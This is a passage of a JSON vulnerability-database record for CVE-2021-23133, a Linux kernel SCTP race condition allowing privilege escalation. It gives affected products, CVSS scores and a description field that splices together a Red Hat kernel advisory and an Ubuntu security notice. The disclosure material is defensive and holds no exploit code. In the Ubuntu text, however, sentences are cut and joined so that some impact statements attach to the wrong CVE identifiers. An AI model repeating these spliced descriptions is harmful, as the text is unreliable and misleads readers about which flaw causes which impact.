"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
}
],
"trust": 0.7
},
"cve": "CVE-2021-23133",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 6.9,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.4,
"id": "CVE-2021-23133",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.0,
"id": "CVE-2021-23133",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "psirt@paloaltonetworks.com",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.8,
"id": "CVE-2021-23133",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-23133",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "psirt@paloaltonetworks.com",
"id": "CVE-2021-23133",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-1348",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-23133",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"description": {
"_id": null,
"data": "A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)-\u003esctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID: RHSA-2021:4356-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4356\nIssue date: 2021-11-09\nCVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. 
\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start with RFC1042\nheader (CVE-2020-26144)\n* kernel: accepting plaintext broadcast fragments as full frames\n(CVE-2020-26145)\n* kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n(CVE-2020-27777)\n* kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a\nread-after-free (CVE-2020-29660)\n* kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a\nlong SSID value (CVE-2020-36158)\n* kernel: slab out-of-bounds read in 
hci_extended_inquiry_result_evt()\n(CVE-2020-36386)\n* kernel: Improper access control in BlueZ may allow information disclosure\nvulnerability. (CVE-2021-0129)\n* kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n(CVE-2021-3348)\n* kernel: Linux kernel eBPF RINGBUF map oversized allocation\n(CVE-2021-3489)\n* kernel: double free in bluetooth subsystem when the HCI device\ninitialization fails (CVE-2021-3564)\n* kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573)\n* kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600)\n* kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679)\n* kernel: Mounting overlayfs inside an unprivileged user namespace can\nreveal files (CVE-2021-3732)\n* kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n(CVE-2021-20194)\n* kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133)\n* kernel: fuse: stall on CPU can occur because a retry loop continually\nfinds the same bad inode (CVE-2021-28950)\n* kernel: System crash in intel_pmu_drain_pebs_nhm in\narch/x86/events/intel/ds.c (CVE-2021-28971)\n* kernel: protection can be bypassed to leak content of kernel memory\n(CVE-2021-29155)\n* kernel: improper input validation in tipc_nl_retrieve_key function in\nnet/tipc/node.c (CVE-2021-29646)\n* kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650)\n* kernel: local escalation of privileges in handling of eBPF programs\n(CVE-2021-31440)\n* kernel: protection of stack pointer against speculative pointer\narithmetic can be bypassed to leak content of kernel memory\n(CVE-2021-31829)\n* kernel: out-of-bounds reads and writes due to enforcing incorrect limits\nfor pointer arithmetic operations by BPF verifier (CVE-2021-33200)\n* kernel: reassembling encrypted fragments with non-consecutive packet\nnumbers (CVE-2020-26146)\n* kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147)\n* kernel: the copy-on-write implementation can grant unintended 
write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n* kernel: flowtable list del corruption with kernel BUG at\nlib/list_debug.c:50 (CVE-2021-3635)\n* kernel: NULL pointer dereference in llsec_key_alloc() in\nnet/mac802154/llsec.c (CVE-2021-3659)\n* kernel: setsockopt System Call Untrusted Pointer Dereference Information\nDisclosure (CVE-2021-20239)\n* kernel: out of bounds array access in drivers/md/dm-ioctl.c\n(CVE-2021-31916)\n\n4. Solution:\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. \n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1509204 - dlm: Add ability to set SO_MARK on DLM sockets\n1793880 - Unreliable RTC synchronization (11-minute mode)\n1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10\n1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity\n1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check\n1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free\n1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt()\n1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value\n1915825 - Allow falling back to genfscon labeling when the FS doesn\u0027t support xattrs and there is a fs_use_xattr rule for it\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 
\n1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c\n1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure\n1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers\n1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers\n1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers\n1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with \u0027serverino\u0027 and \u0027cache=strict \u0027\n1939341 - CNB: net: add inline function skb_csum_is_sctp\n1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode\n1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c\n1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c\n1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS\n1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c\n1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del\n1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory\n1953847 - [ethtool] The `NLM_F_MULTI` should be used for `NLM_F_DUMP`\n1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 
\n1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory\n1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation\n1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection\n1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys\n1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame\n1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client\n1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks\n1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames\n1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks\n1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header\n1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames\n1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers\n1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments\n1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h\n1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs\n1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails\n1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 
\n1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls\n1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier\n1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl()\n1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c\n1971101 - ceph: potential data corruption in cephfs write_begin codepath\n1972278 - libceph: allow addrvecs with a single NONE/blank address\n1974627 - [TIPC] kernel BUG at lib/list_debug.c:31!\n1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0]\n1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c\n1976679 - blk-mq: fix/improve io scheduler batching dispatch\n1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00\n1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50\n1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116)\n1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame\n1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel\n1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level\n1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature\n1978369 - dm writecache: sync with upstream 5.14\n1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?)\n1979680 - Backport openvswitch tracepoints\n1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod\n1986138 - Lockd invalid cast to nlm_lockowner\n1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty()\n1989999 - ceph omnibus backport for RHEL-8.5.0\n1991976 - block: fix New warning in nvme_setup_discard\n1992700 - 
blk-mq: fix kernel panic when iterating over flush request\n1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files\n1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-348.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-348.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-4.18.0-348.el8.aarch64.rpm\nkernel-core-4.18.0-348.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-348.el8.aarch64.rpm\nkernel-debug-4.18.0-348.el8.aarch64.rpm\nkernel-debug-core-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-348.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-devel-4.18.0-348.el8.aarch64.rpm\nkernel-headers-4.18.0-348.el8.aarch64.rpm\nkernel-modules-4.18.0-348.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-348.el8.aarch64.rpm\nkernel-tools-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-348.el8.aarch64.rpm\nperf-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-348.el8.noarch.rpm\nkernel-doc-4.18.0-348.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-348.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-4.18.0-348.el8.ppc64le.rpm\nkernel-core-4.18.0-348.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-348.el8.p
pc64le.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-devel-4.18.0-348.el8.ppc64le.rpm\nkernel-headers-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-4.18.0-348.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-348.el8.ppc64le.rpm\nperf-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-348.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-4.18.0-348.el8.s390x.rpm\nkernel-core-4.18.0-348.el8.s390x.rpm\nkernel-cross-headers-4.18.0-348.el8.s390x.rpm\nkernel-debug-4.18.0-348.el8.s390x.rpm\nkernel-debug-core-4.18.0-348.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool
-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 
8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-kvm: Linux kernel for cloud environments\n\nDetails:\n\nUSN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly enforce limits for pointer operations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. 
(CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. (CVE-2020-24586)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled encrypted fragments. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. \n(CVE-2020-26141)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\naccepted plaintext fragments in certain situations. A physically proximate\nattacker could use this issue to inject packets. (CVE-2020-26145)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. 
(CVE-2021-23133)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nManfred Paul discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel contained an out-of-bounds\nvulnerability. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-31440)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly prevent speculative loads in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nMathias Krause discovered that a null pointer dereference existed in the\nNitro Enclaves kernel driver of the Linux kernel. A local attacker could\nuse this issue to cause a denial of service or possibly execute arbitrary\ncode. (CVE-2021-3543)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.04:\n linux-image-5.11.0-1009-kvm 5.11.0-1009.9\n 